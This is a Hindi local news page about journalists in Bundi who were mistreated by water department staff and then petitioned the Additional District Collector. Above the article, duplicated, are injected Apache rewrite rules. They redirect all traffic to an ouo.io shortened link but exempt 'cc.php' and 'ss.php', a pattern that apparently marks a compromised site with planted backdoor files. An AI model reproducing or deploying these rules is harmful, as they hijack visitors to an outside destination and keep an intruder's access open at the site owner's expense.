
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 738
Nextबूंदी। बूंदी में जलदाय विभाग में ज्ञापन देने आए कांग्रेस के शहर अध्यक्ष देवराज गुर्जर को कवरेज कर रहे पत्रकारों के साथ विभाग के कर्मचारियों ने बदसलूकी की। इस वाकये से गुस्साए पत्रकारों ने आज अतिरिक्त जिला कलेक्टर नरेश मालव को ज्ञापन देकर ऐसे कर्मचारियों के विरुद्ध कार्रवाई करने की मांग की। पत्रकारों का कहना था कि अगर इस तरह की घटनाएं पत्रकारों के साथ होती रही तो समाज का चौथा स्तंभ अपने कार्य को सुगमता, स्वतंत्रता और निर्भीकता के साथ नहीं कर पाएगा। ऐसी घटनाओं पर अंकुश लगना चाहिए और ऐसे लोगों के खिलाफ कठोर कार्रवाई होनी चाहिए पत्रकारों ने पत्रकार सुरक्षा कानून को लेकर भी अतिरिक्त जिला कलेक्टर से वार्ता कर ज्ञापन सौंपा। ज्ञापन देने वालों में राजमार्ग के संपादक विजयता मेरा, दैनिक भास्कर के ब्यूरो चीफ मांगूसिंह, ETV के संवाददाता चैन सिंह, भवानी सिंह सलीम अली, कमलेश शर्मा, अनंत दाधीच, दिनेश शर्मा मौजूद रहे।